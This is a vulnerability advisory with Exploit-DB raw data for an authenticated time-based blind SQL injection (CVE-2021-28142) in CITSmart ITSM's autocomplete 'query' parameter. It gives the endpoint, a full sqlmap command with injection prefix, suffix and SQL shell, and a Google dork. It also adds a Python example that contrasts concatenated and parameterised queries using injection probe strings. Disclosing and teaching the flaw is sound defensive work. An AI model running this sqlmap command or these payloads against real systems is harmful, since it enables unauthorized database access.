Vendor: CITSmart ITSM
By: skysbsb
CVSS: 8.8 (HIGH)
Vulnerability type: Time-based Blind SQL Injection
CWE: 89
Product Name: CITSmart ITSM
Affected Versions: < 9.1.2.28 (advisory written against 9.1.2.27)
Patch Exists: YES
CVE: CVE-2021-28142
CPE: a:citsmart:citsmart_itsm:9.1.2.27
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2021

CITSmart ITSM 9.1.2.27 – ‘query’ Time-based Blind SQL Injection (Authenticated)

Exploitation requires an authenticated session (a valid JSESSIONID cookie). The vulnerable URL is https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale and the vulnerable parameter is 'query'. The prefix closes the string literal and parenthesis the value lands in, and the suffix re-balances the trailing characters of the original statement, so the injected condition is evaluated. Sqlmap usage: sqlmap -u "https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell

Mitigation:

Upgrade to version 9.1.2.28 or later
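The advisory's remediation is the vendor upgrade. For readers maintaining similar autocomplete endpoints, this added example (not CITSmart's code; the statement shape is a hypothetical reconstruction from the advisory's prefix and suffix, and the table rows are constructed) puts the concatenated LIKE query next to its parameterised form and checks each with a true/false condition pair, the boolean analogue of the advisory's time-based probe, since SQLite has no sleep function.

```python
"""Added example (not CITSmart code): the autocomplete LIKE query built by
string concatenation, which the advisory's prefix/suffix pair breaks out of,
next to the parameterised form. Uses an in-memory SQLite table with
constructed sample rows; the statement shape is a hypothetical reconstruction."""
import sqlite3

# Constructed sample catalogue entries (Portuguese, as the 'fale' value suggests).
SERVICES = ["Fale conosco", "Falha de rede", "Solicitar acesso"]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE service (name TEXT)")
    conn.executemany("INSERT INTO service VALUES (?)", [(s,) for s in SERVICES])
    return conn


def autocomplete_vulnerable(conn, query):
    """Concatenates user input into the LIKE pattern. A value ending the
    literal with ') lets the caller append arbitrary conditions; the
    advisory's suffix then re-balances the trailing %')."""
    sql = ("SELECT name FROM service WHERE lower(name) LIKE ('"
           + query.lower() + "%')")
    return [row[0] for row in conn.execute(sql)]


def escape_like(text):
    """Escape LIKE metacharacters so the user cannot widen the pattern."""
    return (text.replace("\\", "\\\\")
                .replace("%", "\\%")
                .replace("_", "\\_"))


def autocomplete_safe(conn, query):
    """Binds the pattern as a parameter; the input is data, never SQL."""
    sql = "SELECT name FROM service WHERE lower(name) LIKE ? ESCAPE '\\'"
    pattern = escape_like(query.lower()) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


def boolean_oracle(conn, handler):
    """True if the handler evaluates caller-supplied conditions: a true and a
    false injected condition must yield different result sets."""
    true_value = "%') AND (1=1) AND ('abc%'='abc"
    false_value = "%') AND (1=2) AND ('abc%'='abc"
    return handler(conn, true_value) != handler(conn, false_value)


if __name__ == "__main__":
    conn = setup_db()
    for handler in (autocomplete_vulnerable, autocomplete_safe):
        print(handler.__name__, handler(conn, "fale"),
              "injectable:", boolean_oracle(conn, handler))
```

Both handlers return the same rows for the benign value "fale"; only the concatenated one changes its answer between the (1=1) and (1=2) probes, because in the parameterised form the whole value is matched as a literal prefix and never parsed as SQL. Escaping % and _ is a separate concern from injection: it stops a user from turning the prefix search into a full-table wildcard.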

Exploit-DB raw data:

# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
# Google Dork: "citsmart.local"
# Date: 11/03/2021
# Exploit Author: skysbsb
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
# Version: < 9.1.2.28
# CVE : CVE-2021-28142

To exploit this flaw it is necessary to be authenticated.

URL vulnerable:
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
Param vulnerable: query

Sqlmap usage: sqlmap -u "https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell

Affected versions: < 9.1.2.28
Fixed versions: >= 9.1.2.28

Vendor has acknowledged this vulnerability in ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)